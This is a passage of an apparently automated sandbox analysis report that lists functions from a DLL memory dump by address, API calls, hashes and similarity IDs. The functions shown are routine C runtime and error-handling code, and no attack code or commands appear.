    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 516a1c2584394e0866a965329c8403746a1b92c70343dab2c43035fa8c9f15fb
    • Instruction ID: bf6ca021936e883721608b25aa1b9d48ad33da37538855d5648539cc9d09aa92
    • Opcode Fuzzy Hash: 516a1c2584394e0866a965329c8403746a1b92c70343dab2c43035fa8c9f15fb
    • Instruction Fuzzy Hash: D2F03031D0012AFBEF169B90CE09FAD7F78EB45756F124165F906E2960DB309E10EBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D544CA5, Relevance: 7.7, APIs: 5, Instructions: 186COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$AllocateHeap
    • String ID:
    • API String ID: 3033488037-0
    • Opcode ID: 02e4e62f87600f68cabf58457e2a3479de4d071d2bb2166810bf7e5509c9508d
    • Instruction ID: d06f77792ee8f0ddd8581fb2f5d9e3da557fbdd9d909316860f9029486c7d242
    • Opcode Fuzzy Hash: 02e4e62f87600f68cabf58457e2a3479de4d071d2bb2166810bf7e5509c9508d
    • Instruction Fuzzy Hash: 11510371A44305AFDB19CF69C841B7A77F4FF88324F118969E919DBA60E770DA00CB82
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D556E9A, Relevance: 7.6, APIs: 5, Instructions: 51COMMON
    Download Yara Rule
    APIs
    • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 6D556EB0
    • GetLastError.KERNEL32(?,?,?), ref: 6D556EBA
    • __dosmaperr.LIBCMT ref: 6D556EC1
    • SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 6D556EDF
    • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 6D556F05
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FilePointer$ErrorLast__dosmaperr
    • String ID:
    • API String ID: 1114809156-0
    • Opcode ID: 19bca68d48311e6227f88e0ee62f7d173bf0c2a21813afd1799563aa5b485f38
    • Instruction ID: e0b1bf03ccd9cfaa8e6d1d85861f49f72c00b5367aa3d05b81e9a35c4b4490e2
    • Opcode Fuzzy Hash: 19bca68d48311e6227f88e0ee62f7d173bf0c2a21813afd1799563aa5b485f38
    • Instruction Fuzzy Hash: B2016971901219BBEF169FA5CC489EF7F3EEF417A4F004506F528965A0C7308A60CBE1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54D765, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 6D54D77D
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D54DA40,?,00000000,?,?,?,6D54DD44,?,00000007,?,?,6D54CB93,?,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54D78F
    • _free.LIBCMT ref: 6D54D7A1
    • _free.LIBCMT ref: 6D54D7B3
    • _free.LIBCMT ref: 6D54D7C5
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 055651cb5680a0f93eb3b2145411d3b54b8a8bfdf0002bd31c62573292479b72
    • Instruction ID: 35cc19189a2f0fc8b008971ae3c199cd004566ee5b58b77260024d7b70d8c769
    • Opcode Fuzzy Hash: 055651cb5680a0f93eb3b2145411d3b54b8a8bfdf0002bd31c62573292479b72
    • Instruction Fuzzy Hash: FBF0EC315046699BCB18DB58E4C9E3673E9AA86714762CC16F165D7D10CF20F9814A92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D543986, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 244COMMON
    Download Yara Rule
    APIs
    • GetCPInfo.KERNEL32(?,?,?,?,?,?,6D543C6B,?,?,000000FF,?,?,?,?,?,?), ref: 6D543A29
    • __freea.LIBCMT ref: 6D543BE0
    • __freea.LIBCMT ref: 6D543BEC
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: __freea$Info
    • String ID: k<Tm
    • API String ID: 541289543-231093855
    • Opcode ID: 6d67d12df5a4a89c85b48e34fd04206f7294dda677b3eae8f9097c9285967ea5
    • Instruction ID: 283e1d9ceef552c2a27c18475199c6cf65df1998344a9d949aca9f22de3fd361
    • Opcode Fuzzy Hash: 6d67d12df5a4a89c85b48e34fd04206f7294dda677b3eae8f9097c9285967ea5
    • Instruction Fuzzy Hash: 02810632E8420A6FFF199E59C841FEF7BB5AF59314F058859E914A7660DB35CC00C7A2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52F271, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON
    Download Yara Rule
    APIs
    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6D52F296
    • CatchIt.LIBVCRUNTIME ref: 6D52F37C
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CatchEncodePointer
    • String ID: MOC$RCC
    • API String ID: 1435073870-2084237596
    • Opcode ID: 69c7c68cc7cc3b85c3d7a282baf7875b96fde169ffe522946f7c77f3c2881310
    • Instruction ID: a149f0fe58e4c2dfae35c050c13240cf5a38d9f4efe91a3d641bacf0499868ba
    • Opcode Fuzzy Hash: 69c7c68cc7cc3b85c3d7a282baf7875b96fde169ffe522946f7c77f3c2881310
    • Instruction Fuzzy Hash: 4541877190020AEFCF0ACFA5DC80AEEBBB6FF48344F158498FA05A7690D3359A54DB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52B60E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON
    Download Yara Rule
    APIs
    • __is_exception_typeof.LIBVCRUNTIME ref: 6D52B6A2
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: __is_exception_typeof
    • String ID: MOC$RCC$csm
    • API String ID: 3140442014-2671469338
    • Opcode ID: f074bce0c1c85b75a9a213a391aed05fb8ce6408951da73dd4d9d74826b09ea2
    • Instruction ID: 65002f9509fbad7b982c144353000c565b5793898702aadffe886003448096e7
    • Opcode Fuzzy Hash: f074bce0c1c85b75a9a213a391aed05fb8ce6408951da73dd4d9d74826b09ea2
    • Instruction Fuzzy Hash: E51190311042069FD70CEF65C405BAAB7B8EF80319F164899D9618BAA1DB74FD44CB92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5365E1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6D53659C), ref: 6D5365EE
    • GetLastError.KERNEL32(?,6D53659C), ref: 6D5365F8
    • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6D536620
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID: api-ms-
    • API String ID: 3177248105-2084034818
    • Opcode ID: c204fed00d970c978e42b33d97bfb0955f4d3ab82ff66dd24e6a628d614e8a76
    • Instruction ID: be396e670d22e28f147a1371ff5748a0ec747c7388ff6931e560585088f58454
    • Opcode Fuzzy Hash: c204fed00d970c978e42b33d97bfb0955f4d3ab82ff66dd24e6a628d614e8a76
    • Instruction Fuzzy Hash: E9E0DF30284305F7EF010B60CC06F283F79AB10B92F118434F90CE8CF0E7A2D42089A4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54BAA0, Relevance: 6.3, APIs: 4, Instructions: 315COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _strrchr
    • String ID:
    • API String ID: 3213747228-0
    • Opcode ID: 980c8adcd1af9b928b3e7a5e4575562b9d836b6c38c44fa632e81d434d7bbfd8
    • Instruction ID: 582291465c59f798e4fd2412e38c13a8f0e77cc82a4094ec0e5dc42478db8b50
    • Opcode Fuzzy Hash: 980c8adcd1af9b928b3e7a5e4575562b9d836b6c38c44fa632e81d434d7bbfd8
    • Instruction Fuzzy Hash: 03B158329182869FDB09DF68C8807FEBBF5EF95344F15C4AAD8409BB41D7348902CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5329BB, Relevance: 6.2, APIs: 4, Instructions: 201COMMON
    Download Yara Rule
    APIs
    • __EH_prolog3.LIBCMT ref: 6D5329C2
    • UnDecorator::getSymbolName.LIBCMT ref: 6D532A50
    • DName::operator+.LIBCMT ref: 6D532B54
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::DName.LIBVCRUNTIME ref: 6D532C11
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
    • String ID:
    • API String ID: 334624791-0
    • Opcode ID: c7d85557593e1af1bdcc6d48dbc1bee3f4970ddb1986be588f32ed5b1fde8ee9
    • Instruction ID: 587d2070596cf407629af46028d83733f3b256ece8c05a4906e21d4246238f51
    • Opcode Fuzzy Hash: c7d85557593e1af1bdcc6d48dbc1bee3f4970ddb1986be588f32ed5b1fde8ee9
    • Instruction Fuzzy Hash: 89818C71C05B6A9FDF19CF98D490BEEBBB4FB0A314F06845AD514ABA40E770D944CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52EC64, Relevance: 6.2, APIs: 4, Instructions: 168COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AdjustPointer
    • String ID:
    • API String ID: 1740715915-0
    • Opcode ID: e39bb55d89399bceb5f33e3d37fd135f1673a55c871df8799d27fe28ed243995
    • Instruction ID: 26e74fac6d2ba16532016b230caa9d8b2aa9705fdeb7cc2bb171e2082c77197a
    • Opcode Fuzzy Hash: e39bb55d89399bceb5f33e3d37fd135f1673a55c871df8799d27fe28ed243995
    • Instruction Fuzzy Hash: 1751BF726046029FEB2D8F64D891BBA77B5FF81310F10492DE91197ED1E731E888CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D533065, Relevance: 6.1, APIs: 4, Instructions: 144COMMON
    Download Yara Rule
    APIs
    • DName::DName.LIBVCRUNTIME ref: 6D5330ED
      • Part of subcall function 6D530206: __aulldvrm.LIBCMT ref: 6D530237
    • DName::operator+.LIBCMT ref: 6D5330FA
    • DName::operator=.LIBVCRUNTIME ref: 6D53317A
    • DName::DName.LIBVCRUNTIME ref: 6D53319A
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: NameName::$Name::operator+Name::operator=__aulldvrm
    • String ID:
    • API String ID: 2448499823-0
    • Opcode ID: 241bb6100157547b4340d68b951d3264de6f32d66e02e24b278c6a8df7c9acbe
    • Instruction ID: 8f2ad706809acf011a399084095663370adedff8d9835a7f0ca3f68c03d70b1d
    • Opcode Fuzzy Hash: 241bb6100157547b4340d68b951d3264de6f32d66e02e24b278c6a8df7c9acbe
    • Instruction Fuzzy Hash: 32513E70944365DFEB0ECF98C880AAEBBB4FB47341F028596E5155BA50E7B09A41CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D545E97, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D546A98: _free.LIBCMT ref: 6D546AA6
      • Part of subcall function 6D547D21: WideCharToMultiByte.KERNEL32(?,00000000,6D54A405,00000000,00000001,6D54A1AC,6D551463,?,6D54A405,?,00000000,?,6D5511C1,0000FDE9,00000000,?), ref: 6D547DC3
    • GetLastError.KERNEL32 ref: 6D545EFF
    • __dosmaperr.LIBCMT ref: 6D545F06
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D545F45
    • __dosmaperr.LIBCMT ref: 6D545F4C
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
    • String ID:
    • API String ID: 167067550-0
    • Opcode ID: c2820295eef3463aabd6cfccb004bc10c8c1a7026dab72fba65a909a4aa32def
    • Instruction ID: 9eb6dafe7d9200fda7ed86e46f3837fcbaf97f0bd8a2a7210f85c49f2a23ce7f
    • Opcode Fuzzy Hash: c2820295eef3463aabd6cfccb004bc10c8c1a7026dab72fba65a909a4aa32def
    • Instruction Fuzzy Hash: CD21B8B160820ABF9B199FA5888097BB76CFF45368711C914F91897D50D731EC5187A3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5435B9, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,?,6D550F08,00000000,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000), ref: 6D5435BE
    • _free.LIBCMT ref: 6D54361B
    • _free.LIBCMT ref: 6D543651
    • SetLastError.KERNEL32(00000000,00000007,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,00000000,00000000,6D572358,0000002C,6D54A405), ref: 6D54365C
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 128da513d7876c498a26989a71156ddcbe19fa3ffbdcdf7e7a161ecfb78680d0
    • Instruction ID: 95d0528b326a27b6e433836493454785324b290c5f7c400f87f743fb48fea11a
    • Opcode Fuzzy Hash: 128da513d7876c498a26989a71156ddcbe19fa3ffbdcdf7e7a161ecfb78680d0
    • Instruction Fuzzy Hash: 8C11C1711481139BFF1D16759C85B3A26696BC637AF238534F33886DE0DB218D044553
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D543710, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,?,6D5438E3,6D54385A,?,?,6D5298A7,000008C8), ref: 6D543715
    • _free.LIBCMT ref: 6D543772
    • _free.LIBCMT ref: 6D5437A8
    • SetLastError.KERNEL32(00000000,00000007,000000FF,?,?,?,6D5438E3,6D54385A,?,?,6D5298A7,000008C8), ref: 6D5437B3
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 4640a452e1d3af5143e38773fc02f15a67d5287ddec6878527eb3a0b0502e6f7
    • Instruction ID: 59156dc9f7c67239fb659d1db27d62b33c44edd4795a70a4d8155a6afb0b6ed0
    • Opcode Fuzzy Hash: 4640a452e1d3af5143e38773fc02f15a67d5287ddec6878527eb3a0b0502e6f7
    • Instruction Fuzzy Hash: 7311E0B514810266FB0946759C85F2A2569BBC637BF23C638F36886DF0EF214E044553
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D558384, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
    Download Yara Rule
    APIs
    • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6D55839E
    • GetLastError.KERNEL32 ref: 6D5583AA
      • Part of subcall function 6D558453: CloseHandle.KERNEL32(FFFFFFFE,6D55849D,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,00000000,00000001,00000000,00000001), ref: 6D558463
    • ___initconout.LIBCMT ref: 6D5583BA
      • Part of subcall function 6D558415: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D558444,6D557078,00000001,?,6D550E97,00000000,00000000,00000001,00000000), ref: 6D558428
    • WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6D5583CE
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: 8ade4b609768295e291b3491c6c5d0a0f0908bde7a112891f3932d88c624b3f2
    • Instruction ID: 9642fec1537e844f0d244dc683af37e97f838b18026d78620c4333d162755602
    • Opcode Fuzzy Hash: 8ade4b609768295e291b3491c6c5d0a0f0908bde7a112891f3932d88c624b3f2
    • Instruction Fuzzy Hash: 61F05E3A111101EBCF531B95DC04A4A7FB6FBCE3A17124425F659D2920DB319860DB52
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D55846A, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
    Download Yara Rule
    APIs
    • WriteConsoleW.KERNEL32(?,?,6D54A405,00000000,?,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,00000000,00000001), ref: 6D558481
    • GetLastError.KERNEL32(?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,00000000,00000001,00000000,00000001,?,6D5513FC,6D54A1AC), ref: 6D55848D
      • Part of subcall function 6D558453: CloseHandle.KERNEL32(FFFFFFFE,6D55849D,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,00000000,00000001,00000000,00000001), ref: 6D558463
    • ___initconout.LIBCMT ref: 6D55849D
      • Part of subcall function 6D558415: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D558444,6D557078,00000001,?,6D550E97,00000000,00000000,00000001,00000000), ref: 6D558428
    • WriteConsoleW.KERNEL32(?,?,6D54A405,00000000,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,00000000,00000001,00000000), ref: 6D5584B2
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: 47d0a9b1d967b31671ef8cfd5b980b2fe918855e3189ebba835ade13e93b45d2
    • Instruction ID: ca9a28d62a191b37c697dec5e38eecc61ba756f227df26cb1d4887d56c0ac264
    • Opcode Fuzzy Hash: 47d0a9b1d967b31671ef8cfd5b980b2fe918855e3189ebba835ade13e93b45d2
    • Instruction Fuzzy Hash: C5F01536112129FBCF535F95DC08A8E3F76FB4E3A6B064511FE0886920C7328820AB92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5445B7, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID: -
    • API String ID: 269201875-2547889144
    • Opcode ID: 70fbed5077f77b19e1ecfd5640eab680b2efcb7de571a823cfda0b2a7e145ac8
    • Instruction ID: 7f1ef56be1a11e8570ec3341c267fb7e764bbac703bf913c6f9f9b1deff4cab3
    • Opcode Fuzzy Hash: 70fbed5077f77b19e1ecfd5640eab680b2efcb7de571a823cfda0b2a7e145ac8
    • Instruction Fuzzy Hash: FAC106319442569BDB2CDF64CC40BFA73B9FF49314F11C8AAD915A7980EBB19E80CB52
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D541E80, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.960049672.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000001.00000002.959547546.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp Download File
    • Associated: 00000001.00000002.969286812.000000006D574000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.969790444.000000006D577000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970627490.000000006D588000.00000004.00020000.sdmp Download File
    • Associated: 00000001.00000002.970936519.000000006D58A000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: __aulldvrm
    • String ID: +$-
    • API String ID: 1302938615-2137968064
